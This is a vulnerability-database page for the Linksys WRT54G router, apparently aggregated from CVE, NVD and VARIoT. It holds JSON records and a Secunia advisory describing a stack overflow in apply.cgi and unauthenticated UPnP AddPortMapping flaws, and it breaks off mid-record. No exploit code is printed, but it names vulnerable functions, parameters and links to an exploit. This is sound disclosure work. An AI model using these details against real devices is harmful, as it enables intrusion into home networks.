76 vulnerabilities found for wrt54g by linksys
CVE-2024-8408 (GCVE-0-2024-8408)
Vulnerability from cvelistv5 – Published: 2024-09-04 14:00 – Updated: 2024-09-04 14:13 – CWE-121 - Stack-based Buffer Overflow
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:h:linksys:wrt54g:4.21.5:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "wrt54g",
"vendor": "linksys",
"versions": [
{
"status": "affected",
"version": "4.21.5"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-8408",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-04T14:12:34.563714Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-04T14:13:56.158Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"modules": [
"POST Parameter Handler"
],
"product": "WRT54G",
"vendor": "Linksys",
"versions": [
{
"status": "affected",
"version": "4.21.5"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "Buaa1otTeam (VulDB User)"
}
],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability was found in Linksys WRT54G 4.21.5. It has been rated as critical. Affected by this issue is the function validate_services_port of the file /apply.cgi of the component POST Parameter Handler. The manipulation of the argument services_array leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."
},
{
"lang": "de",
"value": "Eine kritische Schwachstelle wurde in Linksys WRT54G 4.21.5 ausgemacht. Betroffen davon ist die Funktion validate_services_port der Datei /apply.cgi der Komponente POST Parameter Handler. Durch die Manipulation des Arguments services_array mit unbekannten Daten kann eine stack-based buffer overflow-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei \u00fcber das Netzwerk erfolgen. Der Exploit steht zur \u00f6ffentlichen Verf\u00fcgung."
}
],
"metrics": [
{
"cvssV4_0": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
"version": "4.0"
}
},
{
"cvssV3_1": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
}
},
{
"cvssV3_0": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.0"
}
},
{
"cvssV2_0": {
"baseScore": 6.5,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-121",
"description": "CWE-121 Stack-based Buffer Overflow",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-09-04T14:00:06.823Z",
"orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"shortName": "VulDB"
},
"references": [
{
"name": "VDB-276488 | Linksys WRT54G POST Parameter apply.cgi validate_services_port stack-based overflow",
"tags": [
"vdb-entry",
"technical-description"
],
"url": "https://vuldb.com/?id.276488"
},
{
"name": "VDB-276488 | CTI Indicators (IOB, IOC, IOA)",
"tags": [
"signature",
"permissions-required"
],
"url": "https://vuldb.com/?ctiid.276488"
},
{
"name": "Submit #398567 | Linksys WRT54G v4.21.5 Command Injection",
"tags": [
"third-party-advisory"
],
"url": "https://vuldb.com/?submit.398567"
},
{
"tags": [
"exploit"
],
"url": "https://github.com/BuaaIOTTeam/Iot_Linksys/blob/main/Linksys_WRT54G_validate_services_port.md"
},
{
"tags": [
"product"
],
"url": "https://www.linksys.com/"
}
],
"timeline": [
{
"lang": "en",
"time": "2024-09-04T00:00:00.000Z",
"value": "Advisory disclosed"
},
{
"lang": "en",
"time": "2024-09-04T02:00:00.000Z",
"value": "VulDB entry created"
},
{
"lang": "en",
"time": "2024-09-04T09:06:15.000Z",
"value": "VulDB entry last update"
}
],
"title": "Linksys WRT54G POST Parameter apply.cgi validate_services_port stack-based overflow"
}
},
"cveMetadata": {
"assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"assignerShortName": "VulDB",
"cveId": "CVE-2024-8408",
"datePublished": "2024-09-04T14:00:06.823Z",
"dateReserved": "2024-09-04T07:01:04.112Z",
"dateUpdated": "2024-09-04T14:13:56.158Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2011-4499 (GCVE-0-2011-4499)
Vulnerability from cvelistv5 – Published: 2011-11-22 11:00 – Updated: 2024-09-17 02:33 – n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T00:09:18.433Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.upnp-hacks.org/devices.html"
},
{
"name": "VU#357851",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN",
"x_transferred"
],
"url": "http://www.kb.cert.org/vuls/id/357851"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "The UPnP IGD implementation in the Broadcom UPnP stack on the Cisco Linksys WRT54G with firmware before 4.30.5, WRT54GS v1 through v3 with firmware before 4.71.1, and WRT54GS v4 with firmware before 1.06.1 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an \"external forwarding\" vulnerability."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2011-11-22T11:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.upnp-hacks.org/devices.html"
},
{
"name": "VU#357851",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN"
],
"url": "http://www.kb.cert.org/vuls/id/357851"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2011-4499",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The UPnP IGD implementation in the Broadcom UPnP stack on the Cisco Linksys WRT54G with firmware before 4.30.5, WRT54GS v1 through v3 with firmware before 4.71.1, and WRT54GS v4 with firmware before 1.06.1 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an \"external forwarding\" vulnerability."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.upnp-hacks.org/devices.html",
"refsource": "MISC",
"url": "http://www.upnp-hacks.org/devices.html"
},
{
"name": "VU#357851",
"refsource": "CERT-VN",
"url": "http://www.kb.cert.org/vuls/id/357851"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2011-4499",
"datePublished": "2011-11-22T11:00:00Z",
"dateReserved": "2011-11-22T00:00:00Z",
"dateUpdated": "2024-09-17T02:33:03.064Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-8408 (GCVE-0-2024-8408)
Vulnerability from nvd – Published: 2024-09-04 14:00 – Updated: 2024-09-04 14:13 – CWE-121 - Stack-based Buffer Overflow
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:h:linksys:wrt54g:4.21.5:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "wrt54g",
"vendor": "linksys",
"versions": [
{
"status": "affected",
"version": "4.21.5"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-8408",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-04T14:12:34.563714Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-04T14:13:56.158Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"modules": [
"POST Parameter Handler"
],
"product": "WRT54G",
"vendor": "Linksys",
"versions": [
{
"status": "affected",
"version": "4.21.5"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "Buaa1otTeam (VulDB User)"
}
],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability was found in Linksys WRT54G 4.21.5. It has been rated as critical. Affected by this issue is the function validate_services_port of the file /apply.cgi of the component POST Parameter Handler. The manipulation of the argument services_array leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."
},
{
"lang": "de",
"value": "Eine kritische Schwachstelle wurde in Linksys WRT54G 4.21.5 ausgemacht. Betroffen davon ist die Funktion validate_services_port der Datei /apply.cgi der Komponente POST Parameter Handler. Durch die Manipulation des Arguments services_array mit unbekannten Daten kann eine stack-based buffer overflow-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei \u00fcber das Netzwerk erfolgen. Der Exploit steht zur \u00f6ffentlichen Verf\u00fcgung."
}
],
"metrics": [
{
"cvssV4_0": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
"version": "4.0"
}
},
{
"cvssV3_1": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
}
},
{
"cvssV3_0": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.0"
}
},
{
"cvssV2_0": {
"baseScore": 6.5,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-121",
"description": "CWE-121 Stack-based Buffer Overflow",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-09-04T14:00:06.823Z",
"orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"shortName": "VulDB"
},
"references": [
{
"name": "VDB-276488 | Linksys WRT54G POST Parameter apply.cgi validate_services_port stack-based overflow",
"tags": [
"vdb-entry",
"technical-description"
],
"url": "https://vuldb.com/?id.276488"
},
{
"name": "VDB-276488 | CTI Indicators (IOB, IOC, IOA)",
"tags": [
"signature",
"permissions-required"
],
"url": "https://vuldb.com/?ctiid.276488"
},
{
"name": "Submit #398567 | Linksys WRT54G v4.21.5 Command Injection",
"tags": [
"third-party-advisory"
],
"url": "https://vuldb.com/?submit.398567"
},
{
"tags": [
"exploit"
],
"url": "https://github.com/BuaaIOTTeam/Iot_Linksys/blob/main/Linksys_WRT54G_validate_services_port.md"
},
{
"tags": [
"product"
],
"url": "https://www.linksys.com/"
}
],
"timeline": [
{
"lang": "en",
"time": "2024-09-04T00:00:00.000Z",
"value": "Advisory disclosed"
},
{
"lang": "en",
"time": "2024-09-04T02:00:00.000Z",
"value": "VulDB entry created"
},
{
"lang": "en",
"time": "2024-09-04T09:06:15.000Z",
"value": "VulDB entry last update"
}
],
"title": "Linksys WRT54G POST Parameter apply.cgi validate_services_port stack-based overflow"
}
},
"cveMetadata": {
"assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"assignerShortName": "VulDB",
"cveId": "CVE-2024-8408",
"datePublished": "2024-09-04T14:00:06.823Z",
"dateReserved": "2024-09-04T07:01:04.112Z",
"dateUpdated": "2024-09-04T14:13:56.158Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
VAR-200605-0265
Vulnerability from variot - Updated: 2024-02-14 23:08
Linksys WRT54G Wireless-G Broadband Router allows remote attackers to bypass access restrictions and conduct unauthorized operations via a UPnP request with a modified InternalClient parameter, which is not validated, as demonstrated by using AddPortMapping to forward arbitrary traffic. For example, use AddPortMapping to forward arbitrary traffic. WRT54G v4.0 is prone to a security bypass vulnerability.
TITLE: Linksys WRT54G UPnP Port Mapping Vulnerability
SECUNIA ADVISORY ID: SA20161
VERIFY ADVISORY: http://secunia.com/advisories/20161/
CRITICAL: Less critical
IMPACT: Security Bypass
WHERE:
From local network
OPERATING SYSTEM: Linksys WRT54G Wireless-G Broadband Router http://secunia.com/product/3523/
DESCRIPTION: Armijn Hemel has reported a vulnerability in Linksys WRT54G, which can be exploited by malicious people to bypass certain security restrictions.
The vulnerability is caused due to missing authentication of UPnP AddPortMapping requests and missing validation of the InternalClient parameter of the request. This can be exploited by hosts on the local network to configure port forwarding settings on the device to forward incoming traffic to arbitrary hosts without requiring authentication.
Successful exploitation may allow the device to be configured to forward traffic that is received on specific ports on the external interface to another host on the Internet.
SOLUTION: Update to firmware version 1.00.9. http://www.linksys.com/servlet/Satellite?c=L_Download_C2&childpagename=US%2FLayout&cid=1115417109974&packedargs=sku%3D1127782957298&pagename=Linksys%2FCommon%2FVisitorWrapper
PROVIDED AND/OR DISCOVERED BY: Armijn Hemel
ORIGINAL ADVISORY: http://www.securityview.org/how-does-the-upnp-flaw-works.html
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200605-0265",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "2.02.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "3.03.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "3.01.3"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "2.00.8"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "2.04.4"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "2.04.4_non_default"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "4.00.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "1.42.3"
},
{
"model": "wrt54g v5",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "*"
},
{
"model": "linksys",
"scope": "eq",
"trust": 0.6,
"vendor": "wrt54g",
"version": "1.42.3"
},
{
"model": "linksys",
"scope": "eq",
"trust": 0.6,
"vendor": "wrt54g",
"version": "2.00.8"
},
{
"model": "linksys",
"scope": "eq",
"trust": 0.6,
"vendor": "wrt54g",
"version": "2.02.7"
},
{
"model": "linksys",
"scope": "eq",
"trust": 0.6,
"vendor": "wrt54g",
"version": "2.04.4"
},
{
"model": "linksys 2.04.4 non default",
"scope": null,
"trust": 0.6,
"vendor": "wrt54g",
"version": null
},
{
"model": "linksys",
"scope": "eq",
"trust": 0.6,
"vendor": "wrt54g",
"version": "3.01.3"
},
{
"model": "linksys",
"scope": "eq",
"trust": 0.6,
"vendor": "wrt54g",
"version": "3.03.6"
},
{
"model": "wrt54g v5",
"scope": null,
"trust": 0.6,
"vendor": "linksys",
"version": null
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.0.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.3.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.00.8"
},
{
"model": "wrt54g non default",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v1.02.04.4"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2006-3375"
},
{
"db": "BID",
"id": "87619"
},
{
"db": "CNNVD",
"id": "CNNVD-200605-446"
},
{
"db": "NVD",
"id": "CVE-2006-2559"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:2.04.4_non_default:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:2.04.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:2.02.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:4.00.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:3.01.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g_v5:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:3.03.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:1.42.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:2.00.8:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-2559"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "87619"
}
],
"trust": 0.3
},
"cve": "CVE-2006-2559",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2006-3375",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-18667",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2006-2559",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2006-3375",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200605-446",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-18667",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2006-3375"
},
{
"db": "VULHUB",
"id": "VHN-18667"
},
{
"db": "CNNVD",
"id": "CNNVD-200605-446"
},
{
"db": "NVD",
"id": "CVE-2006-2559"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G Wireless-G Broadband Router allows remote attackers to bypass access restrictions and conduct unauthorized operations via a UPnP request with a modified InternalClient parameter, which is not validated, as demonstrated by using AddPortMapping to forward arbitrary traffic. For example, use AddPortMapping to forward arbitrary traffic. WRT54G v4.0 is prone to a security bypass vulnerability. \n\nTITLE:\nLinksys WRT54G UPnP Port Mapping Vulnerability\n\nSECUNIA ADVISORY ID:\nSA20161\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/20161/\n\nCRITICAL:\nLess critical\n\nIMPACT:\nSecurity Bypass\n\nWHERE:\n\u003eFrom local network\n\nOPERATING SYSTEM:\nLinksys WRT54G Wireless-G Broadband Router\nhttp://secunia.com/product/3523/\n\nDESCRIPTION:\nArmijn Hemel has reported a vulnerability in Linksys WRT54G, which\ncan be exploited by malicious people to bypass certain security\nrestrictions. \n\nThe vulnerability is caused due to missing authentication of UPnP\nAddPortMapping requests and missing validation of the InternalClient\nparameter of the request. This can be exploited by hosts on the local\nnetwork to configure port forwarding settings on the device to forward\nincoming traffic to arbitrary hosts without requiring authentication. \n\nSuccessful exploitation may allow the device to be configured to\nforward traffic that is received on specific ports on the external\ninterface to another host on the Internet. \n\nSOLUTION:\nUpdate to firmware version 1.00.9. 
\nhttp://www.linksys.com/servlet/Satellite?c=L_Download_C2\u0026childpagename=US%2FLayout\u0026cid=1115417109974\u0026packedargs=sku%3D1127782957298\u0026pagename=Linksys%2FCommon%2FVisitorWrapper\n\nPROVIDED AND/OR DISCOVERED BY:\nArmijn Hemel\n\nORIGINAL ADVISORY:\nhttp://www.securityview.org/how-does-the-upnp-flaw-works.html\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2006-2559"
},
{
"db": "CNVD",
"id": "CNVD-2006-3375"
},
{
"db": "BID",
"id": "87619"
},
{
"db": "VULHUB",
"id": "VHN-18667"
},
{
"db": "PACKETSTORM",
"id": "46538"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2006-2559",
"trust": 2.6
},
{
"db": "SECUNIA",
"id": "20161",
"trust": 2.4
},
{
"db": "SECTRACK",
"id": "1016134",
"trust": 2.0
},
{
"db": "VUPEN",
"id": "ADV-2006-1909",
"trust": 1.7
},
{
"db": "XF",
"id": "26707",
"trust": 0.9
},
{
"db": "CNNVD",
"id": "CNNVD-200605-446",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2006-3375",
"trust": 0.6
},
{
"db": "BID",
"id": "87619",
"trust": 0.4
},
{
"db": "VULHUB",
"id": "VHN-18667",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "46538",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2006-3375"
},
{
"db": "VULHUB",
"id": "VHN-18667"
},
{
"db": "BID",
"id": "87619"
},
{
"db": "PACKETSTORM",
"id": "46538"
},
{
"db": "CNNVD",
"id": "CNNVD-200605-446"
},
{
"db": "NVD",
"id": "CVE-2006-2559"
}
]
},
"id": "VAR-200605-0265",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2006-3375"
},
{
"db": "VULHUB",
"id": "VHN-18667"
}
],
"trust": 1.5451049
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2006-3375"
}
]
},
"last_update_date": "2024-02-14T23:08:40.203000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-2559"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.3,
"url": "http://secunia.com/advisories/20161"
},
{
"trust": 2.1,
"url": "http://www.securityview.org/how-does-the-upnp-flaw-works.html"
},
{
"trust": 2.0,
"url": "http://www.securityview.org/dutch-student-finds-a-bug-in-upnp.html"
},
{
"trust": 2.0,
"url": "http://securitytracker.com/id?1016134"
},
{
"trust": 1.1,
"url": "http://www.vupen.com/english/advisories/2006/1909"
},
{
"trust": 1.1,
